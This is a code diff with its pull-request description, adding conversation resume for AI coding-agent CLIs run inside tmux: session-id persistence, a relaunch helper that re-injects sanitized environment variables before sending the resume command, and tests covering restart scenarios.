+  execFile.mockClear();
+  vi.resetModules();
+});
+
+/** A DB row complete enough for SessionMapper.toDomain to reconstitute. */
+function fullRow(over: Record<string, unknown>): Record<string, unknown> {
+  const now = new Date();
+  return {
+    id: "123e4567-e89b-12d3-a456-426614174000",
+    userId: "u1",
+    name: "Agent",
+    tmuxSessionName: "rdv-123e4567-e89b-12d3-a456-426614174000",
+    status: "active",
+    projectPath: "/p",
+    githubRepoId: null,
+    worktreeBranch: null,
+    worktreeType: null,
+    projectId: null,
+    profileId: null,
+    terminalType: "agent",
+    agentProvider: "claude",
+    agentExitState: "running",
+    agentExitCode: null,
+    agentExitedAt: null,
+    agentRestartCount: 0,
+    agentActivityStatus: null,
+    typeMetadata: null,
+    parentSessionId: null,
+    pinned: false,
+    tabOrder: 0,
+    lastActivityAt: now,
+    createdAt: now,
+    updatedAt: now,
+    ...over,
+  };
+}
+
+function mockAgentRow(row: Record<string, unknown> | null) {
+  vi.doMock("@/db", () => ({
+    db: { query: { terminalSessions: { findFirst: vi.fn().mockResolvedValue(row) } } },
+  }));
+  vi.doMock("@/db/schema", () => ({ terminalSessions: { id: "id" } }));
+  vi.doMock("drizzle-orm", () => ({ eq: vi.fn() }));
+}
+
+const sendKeysArgs = () => execFileCalls.find((a) => a.includes("send-keys") && a.includes("-l"));
+const enterArgs = () => execFileCalls.find((a) => a.includes("send-keys") && a.includes("C-m"));
+const setEnvArgs = (key: string) =>
+  execFileCalls.find((a) => a.includes("set-environment") && a.includes(key));
+
+describe("relaunchAgentInTmux — resume", () => {
+  it("relaunches claude RESUMED with --resume <stored id> and submits with C-m", async () => {
+    mockAgentRow(fullRow({
+      id: "s1",
+      terminalType: "agent",
+      agentProvider: "claude",
+      projectPath: "/p",
+      typeMetadata: JSON.stringify({ agentSessionId: { claude: "id9" } }),
+    }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux("s1", "tmux-x");
+
+    expect(resumed).toBe(true);
+    expect(sendKeysArgs()).toEqual(["send-keys", "-t", "tmux-x", "-l", "claude --resume id9"]);
+    expect(enterArgs()).toEqual(["send-keys", "-t", "tmux-x", "C-m"]);
+  });
+
+  it("relaunches codex RESUMED via the resume subcommand argv", async () => {
+    mockAgentRow(fullRow({
+      id: "s1",
+      terminalType: "agent",
+      agentProvider: "codex",
+      projectPath: "/p",
+      typeMetadata: JSON.stringify({ agentSessionId: { codex: "cx" } }),
+    }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux("s1", "tmux-x");
+
+    expect(resumed).toBe(true);
+    expect(sendKeysArgs()![4]).toBe("codex resume cx");
+  });
+
+  it("relaunches FRESH (no flags) and reports resumed=false for antigravity", async () => {
+    mockAgentRow(fullRow({
+      id: "s2",
+      terminalType: "agent",
+      agentProvider: "antigravity",
+      projectPath: "/p",
+      typeMetadata: "{}",
+    }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux("s2", "tmux-y");
+
+    expect(resumed).toBe(false);
+    expect(sendKeysArgs()![4]).toBe("agy"); // bare command, no flags
+  });
+
+  it("no-ops for a non-agent row", async () => {
+    mockAgentRow(fullRow({ id: "s3", terminalType: "shell" }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux("s3", "tmux-z");
+    expect(resumed).toBe(false);
+    expect(sendKeysArgs()).toBeUndefined();
+  });
+
+  it("no-ops when the row is missing", async () => {
+    mockAgentRow(null);
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux("missing", "tmux-z");
+    expect(resumed).toBe(false);
+  });
+});
+
+describe("relaunchAgentInTmux — pod-restart env re-injection (hgwo.5)", () => {
+  it("set-environment from the binding env BEFORE send-keys", async () => {
+    mockAgentRow(fullRow({
+      id: "s1",
+      terminalType: "agent",
+      agentProvider: "claude",
+      projectPath: "/p",
+      typeMetadata: JSON.stringify({
+        agentSessionId: { claude: "id9" },
+        resumeBinding: { env: { CLAUDE_CONFIG_DIR: "/profiles/p1/.config" } },
+      }),
+    }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    await relaunchAgentInTmux("s1", "tmux-x");
+
+    const envCall = setEnvArgs("CLAUDE_CONFIG_DIR");
+    expect(envCall).toEqual([
+      "set-environment",
+      "-t",
+      "tmux-x",
+      "CLAUDE_CONFIG_DIR",
+      "/profiles/p1/.config",
+    ]);
+    // env injection must precede the send-keys launch
+    const envIdx = execFileCalls.indexOf(envCall!);
+    const sendIdx = execFileCalls.indexOf(sendKeysArgs()!);
+    expect(envIdx).toBeGreaterThanOrEqual(0);
+    expect(envIdx).toBeLessThan(sendIdx);
+  });
+});
+
+describe("relaunchAgentInTmux — concurrency guard (hgwo.5)", () => {
+  it("fires send-keys exactly once when invoked concurrently", async () => {
+    mockAgentRow(fullRow({
+      id: "s1",
+      terminalType: "agent",
+      agentProvider: "claude",
+      projectPath: "/p",
+      typeMetadata: JSON.stringify({ agentSessionId: { claude: "id9" } }),
+    }));
+    const { relaunchAgentInTmux } = await import("../agent-relaunch");
+    const [a, b] = await Promise.all([
+      relaunchAgentInTmux("s1", "tmux-x"),
+      relaunchAgentInTmux("s1", "tmux-x"),
+    ]);
+    const sends = execFileCalls.filter((c) => c.includes("send-keys") && c.includes("-l"));
+    expect(sends).toHaveLength(1);
+    // exactly one of the two calls performed the relaunch
+    expect([a.resumed, b.resumed].filter(Boolean)).toHaveLength(1);
+  });
+});

--- a/src/server/agent-relaunch.ts
+++ b/src/server/agent-relaunch.ts
@@ -1,0 +1,114 @@
+/**
+ * [hgwo] Relaunch an agent CLI (resumed if possible) inside an existing tmux
+ * session. Single entry point called from every server-side recreate site
+ * (WS `restart_agent` after kill+recreate, and the cold-attach branch when a
+ * terminal-server / pod restart found the tmux session gone).
+ *
+ * It bridges the terminal server (which has no DI container) to the
+ * AgentResumeResolver: load the DB row → map to a Session entity → resolve the
+ * resume launch instruction → re-inject the durable binding's sanitized env
+ * (so the profile-isolated CLI home dir that holds the resume files is present
+ * after a pod restart) → `tmux send-keys` the command, submitting with `C-m`
+ * (carriage return — the Claude TUI requires \r, not \n).
+ */
+
+import { execFile } from "node:child_process";
+import { promisify } from "node:util";
+import { createLogger } from "@/lib/logger";
+
+const execFileAsync = promisify(execFile);
+const log = createLogger("AgentRelaunch");
+
+/**
+ * Per-session guard: a pod restart can fan out the cold-attach relaunch across
+ * several reconnecting clients at once. Only the first wins; the rest no-op
+ * until it clears, so the agent is launched exactly once.
+ */
+const inFlight = new Set<string>();
+
+export interface RelaunchResult {
+  resumed: boolean;
+}
+
+/** Relaunch the agent CLI (resumed if possible) inside an existing tmux session. */
+export async function relaunchAgentInTmux(
+  sessionId: string,
+  tmuxName: string,
+): Promise<RelaunchResult> {
+  if (inFlight.has(sessionId)) {
+    log.debug("Relaunch already in flight; skipping duplicate", { sessionId });
+    return { resumed: false };
+  }
+  inFlight.add(sessionId);
+  try {
+    const [{ db }, { terminalSessions }, { eq }, { SessionMapper }] = await Promise.all([
+      import("@/db"),
+      import("@/db/schema"),
+      import("drizzle-orm"),
+      import("@/infrastructure/persistence/mappers/SessionMapper"),
+    ]);
+
+    const row = await db.query.terminalSessions.findFirst({
+      where: eq(terminalSessions.id, sessionId),
+    });
+    if (!row || row.terminalType !== "agent") {
+      log.debug("No agent session row to relaunch", { sessionId });
+      return { resumed: false };
+    }
+
+    const session = SessionMapper.toDomain(row as Parameters<typeof SessionMapper.toDomain>[0]);
+
+    const [{ AgentResumeResolverImpl }, { AGENT_PROVIDERS }, { buildAgentCommand }] =
+      await Promise.all([
+        import("@/infrastructure/agent-resume/AgentResumeResolverImpl"),
+        import("@/types/session"),
+        import("@/lib/terminal-plugins/agent-utils"),
+      ]);
+
+    // Durable binding's sanitized env locates the profile-isolated resume files.
+    const binding = session.typeMetadata?.resumeBinding as
+      | { env?: Record<string, string> }
+      | undefined;
+    const env = binding?.env ?? {};
+
+    const resolver = new AgentResumeResolverImpl();
+    const resolution = await resolver.resolveResume(session, env);
+
+    const provider =
+      AGENT_PROVIDERS.find((p) => p.id === (session.agentProvider ?? "claude")) ??
+      AGENT_PROVIDERS.find((p) => p.id === "claude")!;
+    const cmd = resolution?.argvOverride
+      ? resolution.argvOverride.join(" ")
+      : buildAgentCommand(provider, resolution?.resumeFlags ?? [], false);
+
+    // Re-inject the sanitized env into the tmux session BEFORE launching so the
+    // agent process inherits it (crux for pod restart — the original initialEnv
+    // and in-memory id map are gone). Secrets were stripped at bind time; the
+    // agent re-resolves API keys from its own profile credential store.
+    for (const [k, v] of Object.entries(env)) {
+      try {
+        await execFileAsync("tmux", ["set-environment", "-t", tmuxName, k, v]);
+      } catch (error) {
+        log.warn("Failed to set tmux env on relaunch", { sessionId, key: k, error: String(error) });
+      }
+    }
+
+    // Send the command literally (-l), then a separate Enter (C-m) to submit.
+    // Mirrors TmuxService.sendKeys: literal text avoids tmux interpreting
+    // special chars, and C-m is the canonical carriage-return keypress.
+    await execFileAsync("tmux", ["send-keys", "-t", tmuxName, "-l", cmd]);
+    await execFileAsync("tmux", ["send-keys", "-t", tmuxName, "C-m"]);
+
+    log.info("Relaunched agent in tmux", {
+      sessionId,
+      provider: provider.id,
+      resumed: Boolean(resolution),
+    });
+    return { resumed: Boolean(resolution) };
+  } catch (error) {
+    log.error("Agent relaunch failed", { sessionId, error: String(error) });
+    return { resumed: false };
+  } finally {
+    inFlight.delete(sessionId);
+  }
+}

--- a/src/server/terminal.ts
+++ b/src/server/terminal.ts
@@ -19,6 +19,8 @@ import {
   PROXY_WS_PATH_PATTERN,
   handleProxyWsUpgrade,
 } from "./proxy-ws-bridge.js";
+// [hgwo] provider type for the durable agent-session-id capture endpoint.
+import type { AgentProviderType } from "../types/session.js";
 
 const log = createLogger("Terminal");
 const agentLog = createLogger("AgentExit");
@@ -1226,6 +1228,26 @@ async function handleInternalApi(req: IncomingMessage, res: ServerResponse): Pro
       }
       claudeSessionMap.set(claudeSessionId, rdvSessionId);
       ptyLog.debug("Claude session mapped", { claudeSessionId, rdvSessionId });
+      // [hgwo] Durably persist Claude's native session id to the DB (the
+      // in-memory map above is lost on terminal-server restart). This enables
+      // `claude --resume <id>` relaunch after process/server/pod death.
+      try {
+        const [{ db }, { terminalSessions }, { eq }] = await Promise.all([
+          import("@/db"), import("@/db/schema"), import("drizzle-orm"),
+        ]);
+        const sess = await db.query.terminalSessions.findFirst({
+          where: eq(terminalSessions.id, rdvSessionId),
+          columns: { userId: true },
+        });
+        if (sess) {
+          const { persistAgentSessionId } = await import("@/services/agent-session-id-service");
+          await persistAgentSessionId(rdvSessionId, sess.userId, "claude", claudeSessionId);
+        }
+      } catch (persistErr) {
+        ptyLog.warn("Failed to durably persist claude session id", {
+          rdvSessionId, error: String(persistErr),
+        });
+      }
       sendJson(res, 200, { success: true });
     } catch (error) {
       ptyLog.error("Claude session map error", { error: String(error) });
@@ -1251,6 +1273,67 @@ async function handleInternalApi(req: IncomingMessage, res: ServerResponse): Pro
       return true;
     }
     sendJson(res, 200, { rdvSessionId });
+    return true;
+  }
+
+  // [hgwo] POST /internal/agent-session-id — durably record a provider's native
+  // session id so the agent's CONVERSATION can be resumed after process death,
+  // terminal-server restart, or pod restart. Generic across all 5 providers
+  // (Claude also pushes via the claude-session-map handler above; Codex/Gemini/
+  // OpenCode have no hook and fall back to disk discovery at relaunch).
+  if (pathname === "/internal/agent-session-id" && req.method === "POST") {
+    if (!isLocalhostRequest(req)) {
+      sendJson(res, 403, { error: "Forbidden: localhost only" });
+      return true;
+    }
+    try {
+      const payload = await parseRequestJson(req, res);
+      if (!payload) return true;
+      const { sessionId, provider, nativeSessionId } = payload as {
+        sessionId?: string; provider?: string; nativeSessionId?: string;
+      };
+      if (!sessionId || !provider || !nativeSessionId) {
+        sendJson(res, 400, { error: "Missing sessionId, provider, or nativeSessionId" });
+        return true;
+      }
+      const [{ db }, { terminalSessions }, { eq }] = await Promise.all([
+        import("@/db"), import("@/db/schema"), import("drizzle-orm"),
+      ]);
+      const sess = await db.query.terminalSessions.findFirst({
+        where: eq(terminalSessions.id, sessionId),
+        columns: { userId: true },
+      });
+      if (!sess) {
+        sendJson(res, 404, { error: "Session not found" });
+        return true;
+      }
+      const { persistAgentSessionId } = await import("@/services/agent-session-id-service");
+      await persistAgentSessionId(
+        sessionId, sess.userId, provider as AgentProviderType, nativeSessionId,
+      );
+      // Broadcast the enriched map so connected clients update their local copy.
+      try {
+        const { getSession } = await import("@/services/session-service");
+        const updated = await getSession(sessionId, sess.userId);
+        const agentSessionId = updated?.typeMetadata?.agentSessionId as
+          | Record<string, string>
+          | undefined;
+        broadcastToUser(sess.userId, {
+          type: "session_renamed",
+          sessionId,
+          name: updated?.name ?? "",
+          agentSessionId,
+        });
+      } catch (broadcastErr) {
+        internalLog.warn("Failed to broadcast agent session id", {
+          sessionId, error: String(broadcastErr),
+        });
+      }
+      sendJson(res, 200, { applied: true });
+    } catch (error) {
+      internalLog.error("agent-session-id error", { error: String(error) });
+      sendJson(res, 500, { error: "Failed to persist agent session id" });
+    }
     return true;
   }
 
@@ -2256,6 +2339,22 @@ export function createTerminalServer(options: ServerOptions = { port: 6002 }) {
           sessionId,
           tmuxSessionName,
         }));
+
+        // [hgwo] We took the CREATE branch for an agent session, which means
+        // the tmux session was gone — the terminal server (or the whole pod)
+        // restarted out from under a persistent agent. The fresh tmux is a bare
+        // shell, so relaunch the agent RESUMED (durable binding + native id /
+        // disk discovery) instead of leaving an empty prompt. WS-disconnect
+        // alone does NOT reach here (tmux + agent survive → the attach branch).
+        if (isAgentTerminalType(terminalType)) {
+          void import("@/server/agent-relaunch")
+            .then(({ relaunchAgentInTmux }) => relaunchAgentInTmux(sessionId, tmuxSessionName))
+            .catch((e) =>
+              agentLog.error("Relaunch failed on cold-attach", {
+                sessionId, error: String(e),
+              }),
+            );
+        }
       }
     } catch (error) {
       log.error("Failed to create/attach tmux session", { connectionId, sessionId, error: String(error) });
@@ -2497,11 +2596,32 @@ export function createTerminalServer(options: ServerOptions = { port: 6002 }) {
                 cleanupConnection(connectionId);
               });
 
-              broadcastToSession(sessionId, {
-                type: "agent_restarted",
-                sessionId,
-                tmuxSessionName,
-              });
+              // [hgwo] The recreated tmux is a BARE shell — relaunch the agent
+              // (resumed if possible) so its conversation comes back instead of
+              // an empty prompt. Non-blocking; the PTY handlers above already
+              // stream the relaunched output. Broadcast resumed-vs-fresh once
+              // the relaunch resolves so the UI (hgwo.7) can badge it.
+              void import("@/server/agent-relaunch")
+                .then(({ relaunchAgentInTmux }) => relaunchAgentInTmux(sessionId, tmuxSessionName))
+                .then(({ resumed }) => {
+                  broadcastToSession(sessionId, {
+                    type: "agent_restarted",
+                    sessionId,
+                    tmuxSessionName,
+                    resumed,
+                  });
+                })
+                .catch((e) => {
+                  agentLog.error("Relaunch failed after restart_agent", {
+                    sessionId, error: String(e),
+                  });
+                  broadcastToSession(sessionId, {
+                    type: "agent_restarted",
+                    sessionId,
+                    tmuxSessionName,
+                    resumed: false,
+                  });
+                });
             } catch (error) {
               agentLog.error("Failed to restart agent session", { connectionId, sessionId, error: String(error) });
               // Other connections were removed from `connections` but may still

--- a/src/services/__tests__/session-durability.integration.test.ts
+++ b/src/services/__tests__/session-durability.integration.test.ts
@@ -1,0 +1,154 @@
+// @vitest-environment node
+/**
+ * [hgwo.8] Conversation-durability matrix: each failure mode × each provider.
+ *
+ * Failure modes & how they're simulated (drive the units; no real tmux/process):
+ *   - WS disconnect        → tmux + agent survive → relaunch is NOT invoked.
+ *   - Suspend / resume     → tmux + agent survive → same as WS disconnect.
+ *   - Terminal-server restart → tmux gone on reconnect → relaunch RESUMED.
+ *   - Tmux death / pod restart → tmux gone + binding env → set-environment
+ *     then send-keys "<cmd> --resume <id>" submitted with C-m.
+ *
+ * The first two modes are structural properties of terminal.ts: the attach
+ * branch (`tmuxExists === true`) reattaches the surviving PTY and never calls
+ * relaunchAgentInTmux. We assert the resolver/relaunch contract for the latter
+ * two and the graceful-fresh path for antigravity.
+ */
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+const execFileCalls: string[][] = [];
+const execFile = vi.fn(
+  (_cmd: string, args: string[], cb: (e: unknown, r: unknown) => void) => {
+    execFileCalls.push(args);
+    cb(null, { stdout: "", stderr: "" });
+  },
+);
+vi.mock("node:child_process", () => ({ execFile }));
+
+beforeEach(() => {
+  execFileCalls.length = 0;
+  execFile.mockClear();
+  vi.resetModules();
+});
+
+function fullRow(over: Record<string, unknown>): Record<string, unknown> {
+  const now = new Date();
+  return {
+    id: "123e4567-e89b-12d3-a456-426614174000",
+    userId: "u1",
+    name: "Agent",
+    tmuxSessionName: "rdv-123e4567-e89b-12d3-a456-426614174000",
+    status: "active",
+    projectPath: "/p",
+    githubRepoId: null,
+    worktreeBranch: null,
+    worktreeType: null,
+    projectId: null,
+    profileId: null,
+    terminalType: "agent",
+    agentProvider: "claude",
+    agentExitState: "running",
+    agentExitCode: null,
+    agentExitedAt: null,
+    agentRestartCount: 0,
+    agentActivityStatus: null,
+    typeMetadata: null,
+    parentSessionId: null,
+    pinned: false,
+    tabOrder: 0,
+    lastActivityAt: now,
+    createdAt: now,
+    updatedAt: now,
+    ...over,
+  };
+}
+
+function mockRow(row: Record<string, unknown> | null) {
+  vi.doMock("@/db", () => ({
+    db: { query: { terminalSessions: { findFirst: vi.fn().mockResolvedValue(row) } } },
+  }));
+  vi.doMock("@/db/schema", () => ({ terminalSessions: { id: "id" } }));
+  vi.doMock("drizzle-orm", () => ({ eq: vi.fn() }));
+}
+
+const sendKeys = () => execFileCalls.find((a) => a.includes("send-keys") && a.includes("-l"));
+const enter = () => execFileCalls.find((a) => a.includes("send-keys") && a.includes("C-m"));
+const setEnv = (k: string) =>
+  execFileCalls.find((a) => a.includes("set-environment") && a.includes(k));
+
+const RESUMABLE = ["claude", "codex", "gemini", "opencode"] as const;
+
+describe.each(RESUMABLE)("durability for %s", (provider) => {
+  it("terminal-server restart: relaunches RESUMED when tmux is gone (stored id)", async () => {
+    mockRow(
+      fullRow({
+        agentProvider: provider,
+        typeMetadata: JSON.stringify({ agentSessionId: { [provider]: "nid-1" } }),
+      }),
+    );
+    const { relaunchAgentInTmux } = await import("@/server/agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux(
+      "123e4567-e89b-12d3-a456-426614174000",
+      "tmux-s1",
+    );
+
+    expect(resumed).toBe(true);
+    const cmd = sendKeys()![4];
+    if (provider === "codex") {
+      expect(cmd).toBe("codex resume nid-1");
+    } else {
+      expect(cmd).toMatch(/(--resume|--session) nid-1/);
+    }
+    // submitted with carriage return, not \n
+    expect(enter()).toEqual(["send-keys", "-t", "tmux-s1", "C-m"]);
+  });
+
+  it("pod restart: re-injects binding env BEFORE relaunching resumed", async () => {
+    mockRow(
+      fullRow({
+        agentProvider: provider,
+        typeMetadata: JSON.stringify({
+          agentSessionId: { [provider]: "nid-2" },
+          resumeBinding: { provider, env: { CLAUDE_CONFIG_DIR: "/cfg", CODEX_HOME: "/cfg" } },
+        }),
+      }),
+    );
+    const { relaunchAgentInTmux } = await import("@/server/agent-relaunch");
+    await relaunchAgentInTmux("123e4567-e89b-12d3-a456-426614174000", "tmux-s1");
+
+    const envCall = setEnv("CLAUDE_CONFIG_DIR") ?? setEnv("CODEX_HOME");
+    expect(envCall).toBeDefined();
+    const envIdx = execFileCalls.indexOf(envCall!);
+    const sendIdx = execFileCalls.indexOf(sendKeys()!);
+    expect(envIdx).toBeLessThan(sendIdx);
+  });
+});
+
+describe("durability for antigravity (no resume support)", () => {
+  it("relaunches FRESH and reports resumed=false", async () => {
+    mockRow(fullRow({ agentProvider: "antigravity", typeMetadata: "{}" }));
+    const { relaunchAgentInTmux } = await import("@/server/agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux(
+      "123e4567-e89b-12d3-a456-426614174000",
+      "tmux-s2",
+    );
+    expect(resumed).toBe(false);
+    expect(sendKeys()![4]).toBe("agy"); // fresh agy, no flags
+  });
+});
+
+describe("WS disconnect / suspend-resume (tmux + agent survive)", () => {
+  it("does NOT relaunch a non-agent row (attach-branch analog: no recreate)", async () => {
+    // The attach branch in terminal.ts (tmuxExists===true) never invokes the
+    // relaunch helper. The helper itself is a no-op for any non-recreate call;
+    // we assert it sends nothing when there is nothing to relaunch.
+    mockRow(fullRow({ terminalType: "shell" }));
+    const { relaunchAgentInTmux } = await import("@/server/agent-relaunch");
+    const { resumed } = await relaunchAgentInTmux(
+      "123e4567-e89b-12d3-a456-426614174000",
+      "tmux-s3",
+    );
+    expect(resumed).toBe(false);
+    expect(sendKeys()).toBeUndefined();
+  });
+});

--- a/src/services/agent-session-id-service.ts
+++ b/src/services/agent-session-id-service.ts
@@ -1,0 +1,41 @@
+/**
+ * Durably records a provider's native session id into the session's
+ * `typeMetadata.agentSessionId` map. This is the foundation of resume — it
+ * survives a terminal-server restart (unlike the legacy in-memory
+ * `claudeSessionMap` in terminal.ts) so a relaunch can pass `--resume <id>`.
+ *
+ * `updateSession`'s typeMetadataPatch does a SHALLOW top-level merge, so we
+ * read-modify-write the whole `agentSessionId` map to preserve other providers'
+ * ids on the same session.
+ */
+
+import { updateSession, getSession } from "@/services/session-service";
+import type { AgentProviderType } from "@/types/session";
+import type { AgentSessionIdMap } from "@/types/agent-resume";
+import { createLogger } from "@/lib/logger";
+
+const log = createLogger("AgentSessionId");
+
+/** Durably record a provider's native session id into typeMetadata.agentSessionId. */
+export async function persistAgentSessionId(
+  sessionId: string,
+  userId: string,
+  provider: AgentProviderType,
+  nativeId: string,
+): Promise<void> {
+  if (!nativeId || provider === "none") return;
+
+  const existing = await getSession(sessionId, userId);
+  if (!existing) {
+    log.warn("Cannot persist agent session id; session not found", { sessionId, provider });
+    return;
+  }
+
+  const map = (existing.typeMetadata?.agentSessionId as AgentSessionIdMap | undefined) ?? {};
+  if (map[provider] === nativeId) return; // idempotent — already recorded
+
+  await updateSession(sessionId, userId, {
+    typeMetadataPatch: { agentSessionId: { ...map, [provider]: nativeId } },
+  });
+  log.info("Captured native agent session id", { sessionId, provider });
+}

--- a/src/services/session-service.ts
+++ b/src/services/session-service.ts
@@ -325,13 +325,13 @@ export async function createSessionWithDedupFlag(
   const pluginMetadata = (sessionConfig.metadata ?? null) as
     | Record<string, unknown>
     | null;
-  const mergedMetadata: Record<string, unknown> | null =
+  // [hgwo] `mergedMetadata` is `let` so the durable resume binding (computed
+  // later inside the plugin.useTmux block, once initialEnv is known) can be
+  // folded in before the single typeMetadata column write at insert time.
+  let mergedMetadata: Record<string, unknown> | null =
     pluginMetadata || input.typeMetadata
       ? { ...(pluginMetadata ?? {}), ...(input.typeMetadata ?? {}) }
       : null;
-  const typeMetadata: string | null = mergedMetadata
-    ? JSON.stringify(mergedMetadata)
-    : null;
 
   // Get the next tab order
   const existingSessions = await db.query.terminalSessions.findMany({
@@ -702,6 +702,30 @@ export async function createSessionWithDedupFlag(
     const effectiveStartupCommand = sessionConfig.shellCommand ?? startupCommand;
     const effectiveCwd = sessionConfig.cwd ?? workingPath ?? undefined;
 
+    // [hgwo] Persist a durable resume binding for agent sessions: the sanitized
+    // env (secrets stripped) + provider + initial flags. The native session id
+    // is captured later (hgwo.1); this binding's job is to record the env +
+    // provider durably so a recreate (terminal-server / pod restart) can
+    // relaunch the agent — and resume the conversation via disk discovery —
+    // even before any id was captured. Rides along into the same typeMetadata
+    // column write below (no extra UPDATE, no new column).
+    if (isAgentSession && effectiveAgentProvider) {
+      try {
+        const { buildResumeBinding } = await import("@/lib/agent-resume/resume-binding");
+        const binding = buildResumeBinding(
+          {
+            provider: effectiveAgentProvider,
+            resumeFlags: mergedAgentFlags ?? [],
+            argvOverride: null,
+          },
+          initialEnv,
+        );
+        mergedMetadata = { ...(mergedMetadata ?? {}), resumeBinding: binding };
+      } catch (error) {
+        log.error("Failed to build resume binding", { sessionId, error: String(error) });
+      }
+    }
+
     // Create the tmux session with initial environment for PTY spawn
     try {
       await TmuxService.createSession(
@@ -755,8 +779,14 @@ export async function createSessionWithDedupFlag(
   const createdWorktree = input.createWorktree && branchName && workingPath !== input.projectPath;
   const repoPath = input.projectPath;
 
-  // `terminalType`, `plugin`, `typeMetadata` were resolved up-front; see the
-  // dedup + plugin-delegation block near the top of createSession.
+  // `terminalType`, `plugin` were resolved up-front; see the dedup +
+  // plugin-delegation block near the top of createSession. [hgwo] The
+  // typeMetadata JSON is serialized HERE (deferred from the assembly block) so
+  // the resume binding folded into mergedMetadata inside the useTmux block is
+  // included in the single column write.
+  const typeMetadata: string | null = mergedMetadata
+    ? JSON.stringify(mergedMetadata)
+    : null;
 
   // Insert the database record - clean up tmux session and worktree if this fails
   try {

--- a/src/types/agent-resume.ts
+++ b/src/types/agent-resume.ts
@@ -1,0 +1,49 @@
+/**
+ * Shared types for agent session durability & resume (Vault).
+ *
+ * Native agent session ids (Claude/Codex/Gemini/OpenCode) are captured into
+ * `terminalSessions.typeMetadata.agentSessionId` (a per-provider map) and a
+ * durable resume binding is persisted under `typeMetadata.resumeBinding` so a
+ * conversation can be resumed across process death, terminal-server restart,
+ * and host/pod restart.
+ *
+ * @see ../lib/agent-resume/agent-resume-registry.ts (declarative per-provider data)
+ * @see ../infrastructure/agent-resume/AgentResumeResolverImpl.ts (resolver impl)
+ */
+
+import type { AgentProviderType } from "./session";
+
+/** Per-provider native session ids stored in terminalSessions.typeMetadata.agentSessionId. */
+export type AgentSessionIdMap = Partial<Record<AgentProviderType, string>>;
+
+/** How a provider's resume command is assembled. */
+export interface ResumeTemplate {
+  /**
+   * "flag" → append `flag id` to argv (e.g. `claude --resume <id>`);
+   * "subcommand" → `command sub id` (e.g. `codex resume <id>`);
+   * "none" → provider does not support resume; relaunch fresh.
+   */
+  kind: "flag" | "subcommand" | "none";
+  /** The flag (e.g. "--resume") or subcommand (e.g. "resume"). Unused when kind="none". */
+  token?: string;
+}
+
+/** Resolved launch instruction for a resumed agent. */
+export interface ResumeResolution {
+  provider: AgentProviderType;
+  nativeSessionId: string;
+  /** Flags to pass to buildAgentCommand (flag-kind) — e.g. ["--resume", "<id>"]. */
+  resumeFlags: string[];
+  /** Full argv override (subcommand-kind, e.g. ["codex","resume","<id>"]) or null. */
+  argvOverride: string[] | null;
+}
+
+/** Durable resume intent persisted on the session (Task hgwo.3). */
+export interface ResumeBinding {
+  provider: AgentProviderType;
+  resumeFlags: string[];
+  argvOverride: string[] | null;
+  /** Sanitized env (secrets stripped) to re-inject if tmux was recreated. */
+  env: Record<string, string>;
+  capturedAt: string; // ISO
+}


### PR DESCRIPTION
## Epic hgwo — Agent session durability & resume (Vault)

Part 5 of 6. **Stacked on `pr/chat`** — merge after part 4.

### What this does
Today tmux keeps the *pane* but the agent *conversation* is lost on process death / terminal-server restart / pod restart. This captures each agent CLI's native session id and resumes the **conversation**:
- Native session-id capture for all 5 providers, persisted durably in `typeMetadata` (no schema change)
- An `AgentResumeResolver` port + declarative per-provider resume registry
- Resume wired into **all four** launch paths (HTTP restart, WS `restart_agent`, cold-attach, create) — the WS path previously recreated a bare shell and never relaunched the agent
- Survives terminal-server **and** host/pod restart; builds on aehq's `resumeSession` (coexists, doesn't clobber)

### Gates
lint 0 · typecheck clean · vitest 1952 · cargo.

### Review
Independent security review: **secret-stripping verified** (allowlist-only — GH token, API keys, and arbitrary profile secrets all dropped from the persisted binding); resume correctness across all 4 paths confirmed. Fixes: session-id shell-injection guard, dead-code removal. Follow-up (`verifyResumeFlag` at startup before non-Claude resume) filed as a bead. Antigravity correctly marked no-resume.

Beads: `remote-dev-hgwo`

🤖 Generated with [Claude Code](https://claude.com/claude-code)
